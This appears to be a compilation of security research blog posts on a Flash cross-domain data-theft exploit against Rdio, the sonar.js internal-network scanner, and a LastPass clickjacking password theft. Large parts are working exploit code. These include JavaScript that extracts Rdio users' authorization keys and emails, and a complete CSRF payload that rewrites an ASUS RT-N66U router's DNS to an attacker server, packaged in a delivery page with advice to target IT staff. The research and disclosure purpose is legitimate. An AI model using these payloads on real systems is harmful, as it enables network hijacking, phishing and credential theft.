Hey guys,

If you’ve ever pointed your DNS to an EC2 instance or other Amazon service, you might wanna read this piece of research I did while work at Bishop Fox that shows how attackers can take over your domains by drawing from Amazon’s IP pool:

http://www.bishopfox.com/blog/2015/10/fishing-the-aws-ip-pool-for-dangling-domains/

Adobe Flash is no stranger to security issues, but this post isn’t about stack overflows, bypassing ASLR, or sandbox escaping – it’s about building practical exploits against poor use of crossdomain.xml.

For those unfamiliar with cross-domain policies in Flash, check out my previous post here. I’ve also built a nice tool for testing cross-domain requests in Flash which can be found here.

Say a site has done the unspeakable and set their cross-domain policy to a wildcard. They’re completely compromised but now you have to write ActionScript to get a practical exploit going.

Gross. Have you ever written AS3?

In order to avoid ever having to write ActionScript exploits again, I’ve created FlashHTTPRequest. FlashHTTPRequest works as an easy to use bridge for making Flash requests with JavaScript. Instead of writing lengthy ActionScript programs you can just write a simple line like the following:

FlashHTTPRequest.open('GET', 'http://www.rdio.com/', '', 'getAuthToken' );

The arguments are GET/POST for the HTTP method, the URL you wish to request, the request body, and finally the JavaScript callback name.

You’ll notice that Rdio’s website was used in the above example script, this is intentional as Rdio (at the time of this draft) has a wildcard cross-domain policy:

<cross-domain-policy>
	<allow-access-from domain="*" secure="false"/>
	<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

That’s a big no-no, but it provides a great example for using FlashHTTPRequest to make a working proof of concept exploit!

To give a bit of background on how Rdio works, almost all the information you’d need is embedded in the JavaScript on the main page. Here’s an excerpt:

Env = {
        
          
          VERSION: {"version": "9c1d79c9aaaba37f3c29ea00debd8b2af6d87637"},
        
          
          currentUser: {"productAccess": [{"mobile_devices": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}], "web": [{"product": "on_demand", "limits": ["ads", "no_superhigh_bitrate"]}, {"product": "stations", "limits": ["ads", "no_superhigh_bitrate"]}], "name": "free", "ce_devices": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}], "aether": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}]}], "subscriptionType": 1, "has_twitter": false, "features": {"recommendations_page": true, "music_feed": true, "listenertracking_oldcountries": true, "mobile_aac_settings": true, "vdio_user_specific_hr": true, "facebook_landing_new": true, "newton_trending_network": true, "racoon_dragndrop": true, "student_discount"
...trimmed...

All user information can be found under Env.currentUser variable which is in the global scope for the Rdio page. So, let’s extract it!

In order to extract this information we’ll do a dirty hack, our “getAuthToken” function looks like the following:

function getAuthToken( response ) {
    document.getElementById( 'rdio' ).innerHTML = response;

    // We're going to write the response from FlashHTTPRequest into an iframe so the JavaScript will eval
    var ifrm = document.getElementById( 'rdio' );
    ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
    ifrm.document.open();
    ifrm.document.write(response);
    ifrm.document.close();
    var rdioFrame = window.frames[0].window;

    // Since the frame is now within our origin we can reference the Env variable and pull it into our current namespace
    rdio_env = window.frames[0].window.Env;

    // Set the forms on the page to the extracted data
    document.getElementById( 'key' ).value = rdio_env.currentUser.authorizationKey;
    document.getElementById( 'name' ).value = rdio_env.currentUser.firstName + " " + rdio_env.currentUser.lastName;
    document.getElementById( 'email' ).value = rdio_env.currentUser.email;
    document.getElementById( 'profile_link' ).value = "http://rdio.com" + rdio_env.currentUser.url;
    document.getElementById( 'register_date' ).value = rdio_env.currentUser.registrationDate;
    document.getElementById( 'profile_image' ).src = rdio_env.currentUser.icon500;
    document.getElementById( 'wallet_amount' ).value = rdio_env.currentUser.rdioWalletAvailableBalance.amount;
    document.getElementById( 'facebook_id' ).value = "https://www.facebook.com/" + rdio_env.currentUser.facebookId;
}

The above code takes the response from FlashHTTPRequest as a parameter and writes it to an iframe on the page. This gives us a nice sandbox that won’t pollute our own namespace but still allows us to access it’s content from the same origin. We then reference the from with window.frames and pull the Env variable into our page’s namespace. Just like that we’ve extracted all the user info in a JavaScript object that we can manipulate how we want. The impact is easily shown and we didn’t have to write a single line of ActionScript!

The final proof of concept can be seen below, please not this is for educational purposes only and should NOT be used to attack actual Rdio users:

//thehackerblog.com/rdio/

Proof of concept video:

If you’d like to build your own Flash exploit with FlashHTTPRequest, get it here!

Rdio Disclosure Timeline

  • February 26, 2015 – Initial report of wildcard cross domain sent, report was forwarded to the engineering team.
  • March 9, 2015 – An update on progress was requested by me as no changes had been made to the site. Due to the high severity of the issue I state that I will be disclosing in two weeks for the safety of Rdio users.
  • March 11, 2015 – Response received stating that the cross-domain policy is working as intended and requesting more information about why it’s an issue.
  • March 12, 2015 – I responded with a much more detailed explanation of how this can be used to take over an Rdio account. They respond same day saying that much of that is intended but the authorizationKey value being extracted is definitely a security issue. They state the issue is high priority and will have a fix in a few days.
  • March 24, 2015 – Site is still vulnerable, I request an update on progress (ignored).
  • September 22, 2015 – Given up on responsible disclosure.

For archival purposes I’m posting this talk that me and Mike Brooks (a.k.a. Rook) did at Blackhat USA 2015. While we danced around the vendor in the talk description, we can now disclose that that vendor was indeed Akamai – see their blog post about the issue here. Luckily Akamai was super helpful throughout the whole process (which is more than can be said for many vendors!). If any of you find any other vulnerabilities in Akamai, hit them up at [email protected]. This vulnerability chain allowed us to achieve a full Same Origin Policy bypass on many of the internet’s most popular sites (Facebook, Verizon, Microsoft, etc).

“It is unlikely when a bug affects almost every CDN and it becomes vulnerable, but when this happens the possibilities are endless and potentially disastrous.

Imagine – a Facebook worm giving an attacker full access to your bank account completely unbeknownst to you, until seven Bentleys, plane tickets for a herd of llamas, a mink coat once owned by P. Diddy, and a single monster cable all show up on your next statement. What a nightmare.

But in all seriousness, thousands of websites relying on the most popular CDNs are at risk. While some application requirements may need a security bypass in order to work, these intentional bypasses can become a valuable link in an exploit chain. Our research has unveiled a collection of general attack patterns that can be used against the infrastructure that supports high availability websites.

This is a story of exploit development with fascinating consequences.”

Click here for the talk slides.

Recently WebRTC has been in the news as a way to scan internal networks using a regular webpage. We’ve seen some interesting uses of this functionality such as The New York Times scanning your internal network to detect bots. The idea of a random webpage on the internet being able to scan your internal network for live host is a scary one. What could an attacker do with a list of live hosts on your internal network? It gets a bit scarier when you’ve experienced pentesting an internal network. Many internal networks are cluttered with devices stocked with default credentials, a list of CVEs that would make Metasploitable look secure, and forgotten devices that were plugged in to never be configured. However, despite WebRTC being a scary feature of many browsers I haven’t seen any framework for developing exploits using it.

Introducing sonar.js

In response I built sonar.js, a framework that uses JavaScript, WebRTC, and some onload hackery to detect internal devices on a network. sonar.js works by utilizing WebRTC to enumerate live hosts on the internal network. Upon enumerating a live IP sonar.js then attempts to link to static resources such as CSS, images, and JavaScript whilst hooking the onload event handler. If the resource loads successfully and triggers the onload event then we know that the host has this resource. Why is this useful to know? By getting a list of resources hosted on a device we can attempt to fingerprint what that device is. For example, a Linksys WRT56G router has the following static resources:

  • /UILinksys.gif

  • /UI_10.gif

  • /UI_07.gif

  • /UI_06.gif

  • /UI_03.gif

  • /UI_02.gif

  • /UI_Cisco.gif

  • /style.css

So if we embed all of these resources on our page and they return a successful onload event then we can be fairly certain the device is indeed a Linksys WRT54G router. sonar.js automates this process for us and allows penetration testers to build a list of custom exploits for a range of devices, if a device is detected via the methodology above then the appropriate exploit is launched.

Building an Exploit With sonar.js

Now that you know how sonar.js works, let’s build a working proof-of-concept with it. For this exercise we are attempting to re-route all requests on an internal network to our own malicious DNS server. Since all of the clients on the network get their DNS settings from the router via the DHCP we’ll have to compromise it. In a real attack you would have pre-packaged exploits for multiple different router models but we are just going to build one for the popular ASUS RT-N66U WiFi router. Luckily for us the RT-N66U has no Cross-site Request Forgery protection so we can forge requests for those who are authenticated to the router. The following is an example request to change the router’s default DNS server setting (this is the DNS server distributed to all clients on the network):

POST /start_apply.htm HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Advanced_DHCP_Content.asp
Cookie: apps_last=; dm_install=no; dm_enable=no
Authorization: [REDACTED]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 519

productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=

Due to the above request not containing any CSRF tokens or referer checks, we can force an authenticated user to perform the request. Those using Burp’s Professional edition can generate a proof-of-concept by right clicking on the request, choosing “Engagement Tools” and clicking “Generate CSRF PoC”. An example proof of concept script can be seen below:

var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.1/start_apply.htm", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i); 
xhr.send(new Blob([aBody]));

We now have an exploit for our target router – so how do we integrate this into sonar.js? To start we need to create a sonar.js fingerprint, the following code snippet shows this format:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            // Exploit code here
        },
    },
]

Since creating a fingerprint by hand can be a pain, I’ve also created a Chrome extension which will generate one based off of the current page you are on. This is available here:

https://chrome.google.com/webstore/detail/sonar-fingerprint-generat/pmijnndljolchjlfcncaeoejfpjjagef

sonar_fingerprint_generator_picture

As we talked about before sonar.js works by linking to static resources on a host to enumerate it. The fingerprints field of the JavaScript object contains an array of static resources we know to exist on every ASUS RT-N66U router. For example, we know that the image /images/New_ui/asustitle.png is part of the main menu for the RT-N66U web UI. Upon enumerating an IP address sonar.js will attempt to link to the above resources while hooking on the onload event handler to check if they loaded successfully. If all the above resources load successfully sonar.js will then call the callback(ip) function to launch the exploit. So, with a small modification to our exploit we have a fully working sonar.js payload:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://" + ip + "/start_apply.htm", true);
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.withCredentials = true;
            var body = "productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=" + ip + "&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=" + ip + "&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=23.92.52.47&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
        },
    },
}

We then load this fingerprint database into sonar.js:

<!DOCTYPE html>
<html>
    <head>
    </head>
    <body>
        <script src="sonar.js"></script>
        <script src="fingerprint_db.js"></script>
        <script>
            // Sonar.js loading a fingerprint database from fingerprint_db.js
            sonar.load_fingerprints( fingerprints );
            sonar.start();
        </script>
    </body>
</html>

Now we have a working exploit! The next step is to send this payload to our victim. It would be beneficial to target users with router access such as IT staff or system administrators. Upon a user clicking a link to the sonar.js webpage payload the internal network will be scanned for an ASUS RT-N66U router and once it is found the exploit is launched against it.

To show an example of this payload in action, see the following video:

As you can see, we’ve hijacked all DNS requests on the internal network due to a simple cross-site request forgery vulnerability in the RT-N66U router. Now that we have control over the network’s DNS we can redirect requests to things like http://legitbank.com to a phishing page. Suffice to say, when you have control over DNS the game is pretty much over.

The sonar.js Project

We can now build exploits against a range of devices and sonar.js will help us deliver them to internal networks. Currently, the sonar fingerprint database is limited with only a few fingerprints for a few devices. We need your help in expanding this! For more information on generating fingerprints and building exploits with sonar, see the following Github project:

https://github.com/mandatoryprogrammer/sonar.js

LastPass, a popular password management service with addons for Firefox, Chrome, and Internet Explorer suffered from a clickjacking vulnerability which can be exploited on sites without the proper X-Frame-Options headers to steal passwords. The password auto-fill dialogue can be overlayed with a deceptive page to trick users into copying and then pasting their password into an attacker’s site.

Update: After disclosing with the Lastpass folks via their support system and getting a very quick and helpful response this issue is now fixed for all the latest versions of Lastpass on Chrome & Internet Explorer. Kudos to the Lastpass guys for being so quick on patching! The only patch that is not available is for Mozilla Firefox due to Mozilla’s unwillingness to approve the update in a reasonable amount of time. See below for full details.

For the proof of concept example we’ll use Tumblr, which makes use of JavaScript to prevent clickjacking. The protection is ineffective however, as the site can be framed with an HTML5 iframe sandbox to prevent the page from executing JavaScript:

tumblr_framed_javascript_choke

While the page has been prevented from running JavaScript, the Lastpass addon is still able to add its auto-fill functionality to the Tumblr login form. Since this page can be iframed we can overlay an entire page to redress the UI in order to trick the user into clicking through the Lastpass dialogues. The following image shows this UI being redressed to look like a CAPTCHA system against bots:

clickjacking_lastpass_proof_of_concept

The user is prompted to copy the agreement text, followed by clicking on some “randomized buttons” before being asked to paste the agreement text back into a text box. What the user is unaware of is that they are actually copying their Lastpass password for Tumblr upon clicking button number three. When the user goes to paste the agreement text back into the website they are inadvertently giving away their password to the attacker’s site:

password_captured

The trickery becomes obvious when the overlay is made slightly transparent:

revealed_background_tumblr

If you’d like to test this out on your self, try the following link (please note this only works on the Chrome version of Lastpass):

thehackerblog.com/lastpass/

EDIT: The above link no longer works due to Lastpass pushing a fix.

It goes without saying but the script does not actually log your Tumblr password – but you shouldn’t take my word for it.

A video demonstrating the vulnerability is also available here:

The fix for websites is possible by just using an X-Frame-Options: SAMEORIGIN header.

It would be trivial to build this exploit for other websites, please keep in mind that Tumblr has little to do with this issue – they are just the example. The core of the problem was with the Lastpass service.

Disclosure Timeline

  • April 3, 2015 – Issue reported via the Lastpass ticket system
  • April 4, 2015 – Lastpass responds with confirmation of this issue, confirms they will work on figuring out remediation. (Also discussing a mistake with the link I sent them showing the issue)
  • April 20, 2015 – Patch implemented internally for testing before being pushed to production.
  • April 22, 2015 – Path pushed to Chrome browser, other browser patches in the works.
  • July 1, 2015 – Mozilla has still not pushed a patch out despite Lastpass submitting it on April 22nd.

The scariest part of this vulnerability has mainly been the fact the Mozilla has had time to review the patch for months and still hasn’t approved the patch. It’s worrying to think that security updates for Mozilla addons take months to reach users. It’s definitely changed my perspective on Firefox from a security perspective.

EDIT: I talked with someone who reviews addons for Mozilla and they shed some light on why the review took so long for the addon. It appears that the update was much more than just a fix for the clickjacking issue and due to the minified code for Lastpass it took a while to be reviewed. Additionally it appears that the urgency of the patch wasn’t clearly communicated to the Mozilla team. I apologize for the polarized view on the addon review process (a process that I am admittedly unfamiliar with). Overall a very nice explanation and it provided a nice amount of insight into the inner workings of that process.

Until next time,

-mandatory